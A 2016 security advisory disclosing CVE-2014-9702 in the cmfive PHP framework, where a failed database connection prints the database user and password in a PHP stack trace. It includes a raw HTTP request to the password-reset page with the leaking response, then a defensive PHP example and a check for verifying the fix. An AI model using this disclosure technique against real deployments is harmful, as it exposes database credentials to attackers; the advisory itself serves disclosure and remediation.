JAHx161 - cmfive database credential disclosure

Posted by Eldar Marcussen on Tue Sep 13 03:53:03 EDT 2016

The following vulnerability was identified by Eldar "Wireghoul" Marcussen.

About

Cmfive is a PHP framework for creating robust and extensible business applications. It started as a micro framework developed by Carsten Eckelmann in 2007 in Sydney, on the bus to work, lay dormant for years, and then re-emerged as the foundation of the Flow Business System (https://github.com/PyramidPower/flow), which was developed in house to run a 70-person solar installation company. cmFive grew from the Flow codebase but has since been reshaped to be more modern, slimmer, and ready to take on other business applications.

Source code for the framework can be found at https://github.com/2pisoftware/cmfive

CVE-2014-9702 - Informative error messages

Failure to connect to the database raises an uncaught PDOException from the PDO constructor call in cmfive/system/classes/DbPDO.php on line 23. With PHP's display_errors enabled, the resulting fatal error page includes the stack trace, and PHP prints the arguments of every frame in that trace, so the DSN, database user name and password passed to PDO::__construct() are written into the HTTP response. PHP cuts string arguments in trace output at 15 characters (which is why the DSN appears as 'mysql:host=192....'), so a short password is shown in full and a longer one leaks its first 15 characters. As the trace shows, the connection is opened from Web->initDB() during Web->start() in index.php, so any request routed through the front controller will trigger it; the unauthenticated password reset page is simply a convenient one. The following example shows the database user root and password toor being disclosed by shutting down the database before sending a password reset request:

POST /vvv/cmfive/auth/forgotpassword HTTP/1.1
Host: 192.168.58.130
Proxy-Connection: keep-alive
Content-Length: 103
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.58.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.58.130/vvv/cmfive/auth/forgotpassword
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: CM5_SID=fab02g0c47aouii6ot48bp2kj1

XiQV1ll8dB=eca52b325d4bef7ff70a9513c64a7669e36af486226e07445f88bd38fe42aeb8&login=admin

HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 22:29:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.18
Vary: Accept-Encoding
Content-Length: 577
Content-Type: text/html


Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[HY000] [2003] Can't connect to MySQL server on '192.168.58.130' (111)' in /var/www/vvv/cmfive/system/classes/DbPDO.php:23
Stack trace:
#0 /var/www/vvv/cmfive/system/classes/DbPDO.php(23): PDO->__construct('mysql:host=192....', 'root', 'toor', NULL)
#1 /var/www/vvv/cmfive/system/web.php(438): DbPDO->__construct(Array)
#2 /var/www/vvv/cmfive/system/web.php(201): Web->initDB()
#3 /var/www/vvv/cmfive/index.php(16): Web->start()
#4 {main}
  thrown in /var/www/vvv/cmfive/system/classes/DbPDO.php on line 23
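The pattern behind the disclosure, and what a complete fix looks like, as an added example written for this advisory (it is not cmfive's code, and the host, database name and credentials are placeholders; it assumes PHP 7.1 or later). Wrapping only the PDO constructor in try/catch is not sufficient: a replacement exception thrown from inside a function that received the credentials as parameters still carries them in its own trace, and any other uncaught exception is still rendered by PHP's fatal error handler. The example therefore combines three measures: display_errors off, a top-level exception handler that returns a generic page, and a connection wrapper that reads its credentials internally rather than receiving them as arguments.

```php
<?php
// Added example, not cmfive's code. Demonstrates why wrapping the PDO
// constructor alone is not enough and what a complete fix looks like.
// Host, database name and credentials below are placeholders.

declare(strict_types=1);

// 1. Never let PHP print uncaught exceptions to the client. This is the
//    production setting regardless of any try/catch in application code.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// 2. Last line of defence: a top-level handler that returns a generic page
//    and keeps the trace server-side. $e->getTraceAsString() includes call
//    arguments (short strings such as 'toor' verbatim, longer ones cut at
//    15 characters), so it belongs in the log only. On PHP 7.4 and later,
//    zend.exception_ignore_args=1 drops the arguments from traces entirely.
set_exception_handler(function (Throwable $e): void {
    error_log(sprintf(
        "uncaught %s: %s\n%s",
        get_class($e),
        $e->getMessage(),
        $e->getTraceAsString()
    ));
    http_response_code(500);
    header('Content-Type: text/plain');
    echo "Internal server error\n";
});

// 3. Connection boundary: catch the driver exception, log its message, and
//    throw a generic one. The credentials are loaded inside this function
//    rather than passed down the call chain, so no frame of the replacement
//    exception's trace holds them as an argument.
function connectDatabase(): PDO
{
    // Placeholder configuration; a real deployment reads this from a file
    // outside the web root and never from a request-controlled source.
    $config = [
        'host' => '127.0.0.1',
        'name' => 'cmfive',
        'user' => 'cmfive',
        'pass' => 'placeholder-password',
    ];
    $dsn = sprintf('mysql:host=%s;dbname=%s', $config['host'], $config['name']);

    try {
        return new PDO($dsn, $config['user'], $config['pass'], [
            PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        ]);
    } catch (PDOException $e) {
        // The driver text (e.g. "SQLSTATE[HY000] [2003] Can't connect ...")
        // is useful to operators. It never contains the password, but an
        // access-denied message does name the user, so it stays log-only.
        error_log('database connection failed: ' . $e->getMessage());
        throw new RuntimeException('database unavailable');
    }
}

// With the database stopped, the client now receives only
// "Internal server error"; the log holds the driver message and a trace
// whose frames are connectDatabase() and {main}, with no credentials.
$db = connectDatabase();
```

The vulnerable shape from the advisory is simply `new PDO($dsn, $user, $pass)` reached through a chain of calls with no handler and display_errors left on, which is what the PHP 5.3 development-style defaults of the target above provided. When verifying a fix, check the negative case as well as the positive one: stop the database, request any page routed through index.php, and confirm that the response contains neither "Stack trace:" nor the string "PDO->__construct".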

Posted by Eldar Marcussen | Permanent link | File under: security, bug, disclosure